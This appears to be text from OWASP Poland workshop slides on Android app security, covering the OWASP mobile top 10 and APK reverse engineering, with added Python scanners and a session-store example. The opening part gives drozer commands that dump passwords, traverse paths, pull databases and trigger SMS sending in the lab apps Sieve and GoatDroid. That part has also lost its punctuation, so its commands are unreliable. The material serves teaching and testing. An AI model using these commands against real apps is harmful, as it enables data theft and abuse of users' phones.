dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is done on the browser side
• It is done through a „chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embed in the source code the expected X.509 certificate or public key, and check it after the normal chain validation (pinning is an extra check, not a replacement for it):
    if (presented_cert == pinned_cert)
        start_connection();
    else
        drop_connection();
• In practice pin the hash of the SubjectPublicKeyInfo rather than the whole leaf certificate, so a routine certificate renewal with the same key does not lock users out, and ship a backup pin for key rollover
Cert Pinning - reality
• Researchers from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked the developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use MalloDroid:
    mallodroid.py -f AppToCheck.apk -d javaout
• Look for endpoint implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain):
    sslyze --regular www.example.com:443
Insufficient transport layer protection- example
Insufficient transport layer protection - a few facts from reality
• According to FireEye research from July 17, 2014, among the 1,000 most-downloaded free applications in the Google Play store…
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage is about the developer's conscious effort to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data to leak
Unintended data leakage – common leakage points
• URL caching
• Copy/paste buffer caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending the GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using drozer:
    dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged:
    adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
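Reading a logcat dump by eye is slow. The Python below is an added example (not part of the workshop slides) of the check a tester runs over a captured `adb logcat` file: a handful of regexes for the leakage points listed above (credentials, bearer tokens, e-mail addresses, GPS coordinates, device identifiers) plus a Luhn check, so that only real-looking payment card numbers, and not every 16-digit order number, get reported. The log lines embedded in it are constructed, not captured from a device, and the patterns are assumptions to be tuned per app.

```python
import re

# Constructed logcat excerpt (NOT captured from a real device); note the tag/PID prefix format.
SAMPLE_LOGCAT = """\
I/ActivityManager(  512): Start proc com.example.bank for activity com.example.bank/.LoginActivity
D/LoginActivity( 9321): login user=alice@example.com password=Tr0ub4dor&3
D/ApiClient( 9321): GET /v1/me Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.c2lnbmF0dXJl
D/Analytics( 9321): event=open lat=51.1079 lon=17.0385 device_id=3b1f0c9e2a
V/PaymentView( 9321): card=4111111111111111 exp=12/29
V/PaymentView( 9321): order=1234567812345678 qty=2
I/WindowManager(  512): Screen frozen for +3s
"""

# (category, regex) pairs; assumptions that mirror the leakage points from the slide.
RULES = [
    ("credential in log", re.compile(r"\b(pass(word|wd)?|pwd|secret|token|pin)\s*[=:]\s*\S+", re.I)),
    ("bearer token", re.compile(r"\bBearer\s+[A-Za-z0-9_\-.=]+")),
    ("e-mail address", re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")),
    ("GPS coordinates", re.compile(r"\blat(itude)?=-?\d{1,3}\.\d+.*\b(lon|lng|longitude)=-?\d{1,3}\.\d+", re.I)),
    ("device identifier", re.compile(r"\b(device_?id|imei|android_id)=\S+", re.I)),
]
PAN_CANDIDATE = re.compile(r"\b\d{13,19}\b")


def luhn_ok(digits):
    """Luhn checksum; payment card numbers pass it, most other digit runs do not."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(text):
    """Keep the first and last 4 characters so the report does not itself leak the secret."""
    return text if len(text) <= 8 else text[:4] + "*" * (len(text) - 8) + text[-4:]


def scan_logcat(text):
    """Return (line_no, category, masked_match) for every suspicious log line."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for category, rx in RULES:
            m = rx.search(line)
            if m:
                findings.append((line_no, category, mask(m.group(0))))
        for m in PAN_CANDIDATE.finditer(line):
            if luhn_ok(m.group(0)):
                findings.append((line_no, "payment card number (Luhn-valid)", mask(m.group(0))))
    return findings


def demo():
    return scan_logcat(SAMPLE_LOGCAT)


if __name__ == "__main__":
    for line_no, category, match in demo():
        print("line %d: %s -> %s" % (line_no, category, match))
```

Feed it a file saved with adb logcat -d > app.log; the order=… line in the sample is the control that shows why the Luhn check is worth the five lines.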
Unintended data leakage - demo
Unintended data leakage - mitigations
• NEVER log any sensitive information (watch what you're storing in crash logs, too); since Android 4.1 third-party apps can no longer read the global log, but anyone with adb access or a rooted device still can
• Disable the copy/paste function for sensitive parts of the application
• Disable debugging (android:debuggable="false"; the build tools inject android:debuggable="true" into debug builds, so check the manifest of the APK you actually ship)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication – what it is
• Simple words definition: if you're able to bypass authentication and/or elevate your privileges, then… your app has poor authorization and/or authentication
Poor Authorization and Authentication – how to find
• Try to bypass authentication by starting exported activities directly using drozer:
    dz> run app.activity.start --component <package_name> <component_name>
• Intercept traffic with Burp and modify parameters to log in as another user / see unauthorized content (e.g. by manipulating the device ID)
• Test the account lockout policy
• Test the password strength policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication – real example
• A flaw in an application can become an entry point to compromise the operating system
• For example the Viber app (lock-screen bypass): https://www.youtube.com/watch?time_continue=40&v=rScheIQDD0k
And always remember to…
• …stay reasonable when you're going to follow advice from the Internet…
Poor Authorization and Authentication - mitigations
• Assume that client-side authorization and authentication controls can be bypassed – they must be enforced again on the server side wherever possible
• Persistent authentication („Remember Me") functionality implemented within mobile applications should never store a user's password on the device; it should be optional and not enabled by default
M6 - Broken Cryptography
Broken Cryptography – what it is
• Simple words definition: using an insecure implementation, or using a secure one in an insecure way
• A few reminders (yeah, I know you know it…):
– encoding ≠ encryption
– obfuscation ≠ encryption
Broken Cryptography – how to find
• Decompile the APK using dex2jar and review the JAR file in JD-GUI (or in Luyten, for a more verbose result)
• Look for decryption keys (in attacker-readable folders or hardcoded within the binary)
• Try to break the encryption algorithm if the application uses custom encryption
• Look for usage of insecure and/or deprecated algorithms (e.g. RC4, MD4/MD5, SHA-1, DES, AES in ECB mode, etc.)
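Both „how to find" lists, the transport-layer one earlier and this one, end at the same place: decompile and read. The Python below is an added example (not the workshop's code) of a first regex pass over the decompiled Java that points the manual review at the usual suspects: an empty checkServerTrusted() (trust-all TrustManager), verify() returning true (accept-all HostnameVerifier), WebView SSL errors being proceeded past, SSLv3 contexts, MD5/SHA-1/RC4/DES, the bare „AES" transformation (which defaults to ECB) and string or byte-array literals fed to SecretKeySpec. The Java snippet it scans is constructed for the demo. MalloDroid itself works on the Dalvik bytecode with androguard; this is the cheap text-level approximation you run on the dex2jar output.

```python
import re

# Constructed decompiled-Java sample containing the patterns to catch (plus two safe calls as controls).
SAMPLE_JAVA = """\
public class NaiveTrust implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] chain, String authType) {}
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
    }
    public X509Certificate[] getAcceptedIssuers() { return null; }
}
HostnameVerifier hv = new HostnameVerifier() {
    public boolean verify(String hostname, SSLSession session) { return true; }
};
SSLContext ctx = SSLContext.getInstance("SSLv3");
MessageDigest md = MessageDigest.getInstance("MD5");
Cipher weak = Cipher.getInstance("AES");
SecretKeySpec key = new SecretKeySpec("s3cr3tPassw0rd!!".getBytes(), "AES");
Cipher ok = Cipher.getInstance("AES/GCM/NoPadding");
MessageDigest sha = MessageDigest.getInstance("SHA-256");
"""

# (regex, finding). re.S lets brace bodies span lines. Assumption: dex2jar + JD-GUI/Luyten style output.
TLS_RULES = [
    (r"checkServerTrusted\s*\([^)]*\)\s*(throws[^{]*)?\{\s*\}",
     "empty checkServerTrusted(): TrustManager trusts ALL certificates"),
    (r"ALLOW_ALL_HOSTNAME_VERIFIER",
     "ALLOW_ALL_HOSTNAME_VERIFIER: any hostname accepted"),
    (r"boolean\s+verify\s*\(\s*String[^)]*SSLSession[^)]*\)\s*\{\s*return\s+true\s*;",
     "HostnameVerifier.verify() returns true unconditionally"),
    (r"onReceivedSslError\s*\([^)]*\)\s*\{[^}]*\.proceed\s*\(\s*\)",
     "WebViewClient.onReceivedSslError() calls proceed(): TLS errors ignored"),
    (r"SSLContext\.getInstance\s*\(\s*\"(SSLv?[23]|SSL)\"",
     "SSLContext requests an SSLv3-capable protocol"),
]
CRYPTO_RULES = [
    (r"MessageDigest\.getInstance\s*\(\s*\"(MD[245]|SHA-?1)\"",
     "weak hash algorithm"),
    (r"Cipher\.getInstance\s*\(\s*\"(RC4|ARCFOUR|DES|DESede|Blowfish)[\"/]",
     "weak or deprecated cipher"),
    (r"Cipher\.getInstance\s*\(\s*\"AES(/ECB)?\"",
     "AES in ECB mode (the bare \"AES\" transformation defaults to ECB)"),
    (r"new\s+SecretKeySpec\s*\(\s*(\"[^\"]*\"\.getBytes|new\s+byte\s*\[\]\s*\{)",
     "hardcoded key material passed to SecretKeySpec"),
]


def scan_source(text, rules=TLS_RULES + CRYPTO_RULES):
    """Return (line_no, finding) pairs, sorted by line, for every rule hit in decompiled source."""
    findings = []
    for pattern, finding in rules:
        for m in re.finditer(pattern, text, re.S):
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append((line_no, finding))
    return sorted(findings)


def demo():
    return scan_source(SAMPLE_JAVA)


if __name__ == "__main__":
    for line_no, finding in demo():
        print("line %d: %s" % (line_no, finding))
```

Point scan_source() at each .java file under the decompiler's output directory; a hit is a place to read, not a confirmed finding (a trust-all TrustManager may be dead code, a hardcoded key may be a test vector), which is why the manual review from the slide still follows.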
Broken Cryptography - example
• An encrypted DB is definitely a good idea…
Broken Cryptography - example
• …but not when you're hardcoding the password to decrypt it in the code…
Broken Cryptography – real example
• NQ Vault (the „vault" only XORed files with a key derived from the user's PIN; see the cracking-nq-vault write-up in the references)
Broken Cryptography - mitigations
• Use well-known, strong cryptography implementations; do not roll your own
• Do not hardcode keys/credentials/OAuth tokens
• Do not store keys on the device; use password-based encryption instead (derive the key from the user's password with a slow KDF such as PBKDF2 and keep it only in memory)
M7 - Client side injection
Client side injection – what it is
• Simple words definition: malicious code can be provided as input and executed by the application (on the client side)
• The malicious code can come from:
– another application, via an Intent or a content provider
– a shared file
– a server response
– a third-party website
Client side injection – what to inject
• SQL injection into the local DB
• XSS / WebView injection
• Directory traversal
• Intent injection
A new Android toy – Intents
• An Android application can talk (inter-process communication) to any other component (e.g. another application, a system service, a new activity, etc.) via special objects called Intents:
    Intent i = new Intent(Intent.ACTION_VIEW, Uri.parse("https://owasp.org"));
    Intent i = new Intent(android.provider.MediaStore.ACTION_IMAGE_CAPTURE);
Client side injection – how to find
• SQL injections:
    dz> run scanner.provider.injection -a <package_name>
• Data path traversal:
    dz> run scanner.provider.traversal -a <package_name>
• Intent injections:
    dz> run app.package.manifest <package_name>
    dz> run app.activity.info -a <package_name>
    dz> run app.service.info --permission null -a <package_name>
    dz> run intents.fuzzinozer --package_name <package_name> --fuzzing_intent
Client side injection – real example
• UniversalMDMClient (a built-in application of Samsung KNOX – a security feature to separate personal and professional activities)
• A crafted URI with the „smdm://" scheme allows remote installation of ANY application, while the user thinks he's installing an update for UniversalMDMClient
• How it works in practice: https://www.youtube.com/watch?time_continue=56&v=6O9OBmsv-CM
Client side injection - mitigations
• Always validate any user input on the server side
• For internal communication use only explicit Intents
• Avoid intent-filters on internal components: declaring one exports the component by default (unless android:exported="false" is set explicitly). And even if the Activity has android:exported="false", another application can declare the same filter; when your app then sends a matching implicit Intent, the system displays a chooser dialog and the user can pick the other app
M9 - Improper session handling
Improper session handling – what it is
• Simple words definition: if your session token can be guessed, retrieved by a third party, or never expires, then you have a problem
Improper session handling – how to find
• Intercept requests with a proxy (e.g. Burp) and:
– verify if a session expires (copy a cookie and try to use it after 30 minutes)
– verify if a session is destroyed after the authentication state changes (e.g. switching from one logged-in user to another)
– verify if you are able to guess any other session (e.g. it's easy to impersonate another user when the application uses the device ID as the session token)
Improper session handling – a few facts from reality
• What we know is that „sessions have to expire"…
• …but how long should a session REALLY last?
• According to an experiment, the average application session (counted from opening an app to closing it) lasts… 71.56 seconds
– http://www.mendeley.com/research/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
• Invalidate sessions on the server side
• Set a session expiration time adjusted to your application
• Destroy all unused session tokens
• Use only high-entropy, tested token generation resources (the platform CSPRNG, never device IDs or timestamps)
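The mitigations above are server-side work, so the added example below is server-side Python (not part of the workshop slides): a session registry whose tokens come from the OS CSPRNG, which stores only a hash of each token (a leaked session table cannot be replayed), expires sessions on both an idle and an absolute timeout, rotates the token whenever the authentication state changes, and lets you revoke every session of a user. The timeouts and the in-memory dict are assumptions for the demo; a real deployment keeps the table in a shared store. demo() walks through exactly the three checks from the „how to find" slide with a fake clock.

```python
import hashlib
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before a session dies (assumption: tune per app)
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap regardless of activity


class SessionStore:
    """Server-side session registry; the client only ever holds an opaque random token."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}   # sha256(token) -> {"user", "created", "last_seen"}

    @staticmethod
    def _key(token):
        # Store a hash, not the token: a dump of this table cannot be replayed, and the
        # dict lookup compares digests, never the secret itself.
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def create(self, user):
        """256 bits from the OS CSPRNG; never derive tokens from device IDs, user names or time."""
        token = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[self._key(token)] = {"user": user, "created": now, "last_seen": now}
        return token

    def validate(self, token):
        """Return the user of a live session or None; expired sessions are destroyed on sight."""
        s = self._sessions.get(self._key(token))
        if s is None:
            return None
        now = self._clock()
        if now - s["last_seen"] > IDLE_TIMEOUT or now - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[self._key(token)]
            return None
        s["last_seen"] = now
        return s["user"]

    def rotate(self, token):
        """On any authentication-state change (login, re-auth, privilege change): new token, old one dead."""
        s = self._sessions.pop(self._key(token), None)
        return None if s is None else self.create(s["user"])

    def logout(self, token):
        self._sessions.pop(self._key(token), None)

    def revoke_user(self, user):
        """Destroy every session of one user (password change, lost device)."""
        for k in [k for k, s in self._sessions.items() if s["user"] == user]:
            del self._sessions[k]


def demo():
    """Replay the three checks from the 'how to find' slide against a fake clock."""
    now = [1_000_000.0]
    store = SessionStore(clock=lambda: now[0])
    results = {}
    t = store.create("alice")
    results["valid_now"] = store.validate(t) == "alice"
    now[0] += IDLE_TIMEOUT + 1                   # copy the token, replay it after the idle window
    results["valid_after_idle"] = store.validate(t) == "alice"
    t2 = store.create("alice")
    t3 = store.rotate(t2)                        # auth state changed: the old token must die
    results["old_token_after_rotate"] = store.validate(t2) == "alice"
    results["new_token_after_rotate"] = store.validate(t3) == "alice"
    store.create("alice")
    store.revoke_user("alice")                   # e.g. password change: nothing of alice survives
    results["any_left_after_revoke"] = store.validate(t3) == "alice"
    results["tokens_differ"] = len({t, t2, t3}) == 3
    return results


if __name__ == "__main__":
    for check, value in demo().items():
        print("%-25s %s" % (check, value))
```

The 71.56-second figure above is an argument for a short idle timeout with a cheap re-authentication path, not for sessions that never expire.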
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an APK
Getting our APK file
• From the phone:
– APKOptic
– Astro File Manager
• Using ADB (adb shell pm path <package> prints the path of the installed APK, then adb pull it)
• Use APKPure
Decompiling || Disassembling
• Decompiling – high level – Java code
• Disassembling – low level – Dalvik assembly (smali)
• Why disassembling and not decompiling? (decompilation is lossy and can fail on obfuscated code, while smali can always be edited and reassembled)
Decompiling
DEX → JAR → Java
Decompiling – dex2jar
• dex2jar:
– converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– allows using any existing Java decompiler on the resulting JAR file
Decompiling – Java decompilers
• JD-GUI || Luyten:
– Java decompiler front-ends (Luyten is a GUI for the Procyon decompiler)
– combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → Smali
• Apktool:
– open-source Java tool for reverse-engineering Android apps
– transforms binary Dalvik bytecode (DEX) into Smali source, and assembles it back when you rebuild the APK
Signing apk
• Using signapk.jar:
    java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
• A rebuilt (e.g. smali-patched) APK must be re-signed before it installs; it is signed with your key, so it will not install over the original app (signature mismatch) – uninstall the original first
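An APK is a ZIP, and the code inside it is classes.dex, whose 0x70-byte header starts with a magic, an Adler-32 checksum and a SHA-1 signature over the rest of the file. That is why a smali edit followed by apktool b works only because the tool rewrites those fields, and why the rebuilt APK then needs a fresh signature on top. The Python below is an added example (not from the workshop slides) that opens an APK, parses the DEX header, verifies checksum and signature, shows both failing after a one-byte patch, and recomputes them. The minimal DEX and the APK wrapper it builds are constructed in memory; a real classes.dex has the same header followed by the string/type/method tables.

```python
import hashlib
import io
import struct
import zipfile
import zlib

# DEX header: magic(8) checksum(4) signature(20) then 20 little-endian uint32 fields = 0x70 bytes
DEX_HEADER = struct.Struct("<8sI20s20I")
DEX_HEADER_SIZE = 0x70
FIELDS = ("file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
          "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
          "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
          "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
          "data_size", "data_off")


def dex_checksum(dex):
    """Adler-32 over everything after the checksum field (offset 12 to end)."""
    return zlib.adler32(dex[12:]) & 0xFFFFFFFF


def dex_signature(dex):
    """SHA-1 over everything after the signature field (offset 32 to end)."""
    return hashlib.sha1(dex[32:]).digest()


def parse_dex_header(dex):
    magic, checksum, signature, *rest = DEX_HEADER.unpack_from(dex, 0)
    hdr = dict(zip(FIELDS, rest))
    hdr["magic_ok"] = magic[:4] == b"dex\n" and magic[7:8] == b"\x00"
    hdr["version"] = magic[4:7].decode("ascii", "replace")
    hdr["checksum_ok"] = checksum == dex_checksum(dex)
    hdr["signature_ok"] = signature == dex_signature(dex)
    hdr["file_size_ok"] = hdr["file_size"] == len(dex)
    return hdr


def fix_dex_hashes(dex):
    """What apktool/smali do after patching: file_size, then signature, then checksum
    (in that order, because the checksum covers the signature field)."""
    buf = bytearray(dex)
    struct.pack_into("<I", buf, 32, len(buf))
    buf[12:32] = dex_signature(bytes(buf))
    struct.pack_into("<I", buf, 8, dex_checksum(bytes(buf)))
    return bytes(buf)


def build_sample_dex():
    """Constructed minimal classes.dex: a header with empty tables and a 16-byte data section."""
    fields = [0] * 20
    fields[FIELDS.index("header_size")] = DEX_HEADER_SIZE
    fields[FIELDS.index("endian_tag")] = 0x12345678
    fields[FIELDS.index("data_size")] = 16
    fields[FIELDS.index("data_off")] = DEX_HEADER_SIZE
    raw = DEX_HEADER.pack(b"dex\n035\x00", 0, b"\x00" * 20, *fields) + b"\x00" * 16
    return fix_dex_hashes(raw)


def build_sample_apk(dex):
    """Constructed APK: a ZIP with a placeholder manifest and the given classes.dex."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<binary xml placeholder>")
        z.writestr("classes.dex", dex)
    return buf.getvalue()


def inspect_apk(apk_bytes):
    """List the APK entries and validate every classes*.dex header inside."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dexes = {n: parse_dex_header(z.read(n))
                 for n in names if n.startswith("classes") and n.endswith(".dex")}
    return {"entries": names, "dex": dexes}


def demo():
    dex = build_sample_dex()
    good = inspect_apk(build_sample_apk(dex))["dex"]["classes.dex"]
    patched = bytearray(dex)
    patched[DEX_HEADER_SIZE] ^= 0xFF          # "edit one instruction" in the data section
    bad = parse_dex_header(bytes(patched))
    fixed = parse_dex_header(fix_dex_hashes(bytes(patched)))
    return {"good": (good["magic_ok"], good["checksum_ok"], good["signature_ok"], good["version"]),
            "patched": (bad["checksum_ok"], bad["signature_ok"]),
            "rehashed": (fixed["checksum_ok"], fixed["signature_ok"])}


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

On a real file, inspect_apk(open("app.apk", "rb").read()) also gives you the string_ids/method_ids counts, a quick size-of-the-job estimate before opening the decompiler; a checksum mismatch on a sample you did not patch yourself is worth a closer look.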
Demo time
Demo: decompiling with Luyten
Demo: modifying Smali files
Demo
Android Application Components
AndroidManifest.xml defines the way the app works and what kind of interaction between the components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions:
    <uses-permission android:name="string" />
    <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users); must be granted by the user
• normal – minimal risk (default value); granted automatically to any app that requests it
• signature – granted only to apps signed with the same certificate
• signatureOrSystem – same certificate || app in the Android system image (deprecated in API 23 in favour of signature|privileged)
Android Manifest
Attributes to look at:
• debuggable
• enabled
• exported
• permission
Example component attributes (activities, services, content providers, broadcast receivers)
Intents
An Intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
    Intent intent = new Intent(Intent.ACTION_VIEW);
    intent.setData(Uri.parse("http://www.google.com"));
    String pack = "com.android.browser";
    ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
    intent.setComponent(comp);
    startActivity(intent);
Drozer
Open-source tool to interact with other applications through IPC – the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about drozer: you don't need to write your own apps to interact with other apps :)
    dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer is installed in the default package of AppUse, together with adb, so it's enough to just „click and play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: the login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• By launching it with Intents it's possible to achieve the following:
– modify data in the background
– trick the user
– leak sensitive information
Activity components attacks
• General hijacking scheme
• Results of an attack:
– a malicious Activity could read the data in the Intent and then immediately relay it to the legitimate one
– spoofing the expected Activity's user interface to steal user-supplied data (phishing)
(diagram: activity hijacking between apps A, B and E)
Activity components attacks
• List and launch exported activities:
    dz> run app.activity.info -a com.mwr.example.sieve
    Package: com.mwr.example.sieve
